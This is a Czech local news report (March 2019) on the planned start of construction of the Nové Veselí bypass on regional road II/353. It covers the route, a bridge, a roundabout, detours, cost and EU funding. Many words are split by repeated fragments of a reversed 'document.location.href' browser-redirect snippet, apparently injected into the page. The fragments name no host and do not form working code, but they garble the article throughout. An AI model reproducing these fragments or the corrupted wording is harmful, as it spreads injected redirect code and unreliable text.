Rainbow page separator

V nejbližších dnech začnou práce na obchvatu Nového Veselí

Neděle, 10. března 2019

Nové Veselí / Stavební práce na výstavbě obchvatu Nového Veselí a Budče budou zahájeny v polovině března. Ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovo má být koncem příštího roku. Přeložka krajské silnice II/353 spojující Žďár s Jihlavou povede východně od zastavěného území. V plánu je vybudovat most pro překonání řeky Oslavy a také okružní křižovatku pro usměrnění provozu v křížení obchvatu s komunikací III/35311 z Nového Veselí do Březí nad Oslavou. Právě výstavba kruhové křižovatky bude zhruba od srpna le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku znamenat dočasné uzavření té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to cesty. Objízdná trasa do Březí povede přes Bohdalov a Pokojov. Dopravní omezení na stávající silnici II/353 jsou naplánována až na příští rok, kdy dojde k napojení obchvatu.
Více než pět kilometrů nové komunikace za 350 milionů korun, kterou uhradí Kraj Vysočina za podpory evropské dotace ve výši téměř 270 milionů korun, má mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristům začít sloužit v lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu 2020.
Prosadit stavbu obchvatu městyse, kde frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná silnice vede asi na třinácti s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovkách metrů jeho středem, přičemž v úseku je také několik nepřehledných zatáček, se Nové Veselí snažilo dlouhá léta. V okolí už ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to silnice obešla Bohdalov na Žďársku a Jamné na Jihlavsku.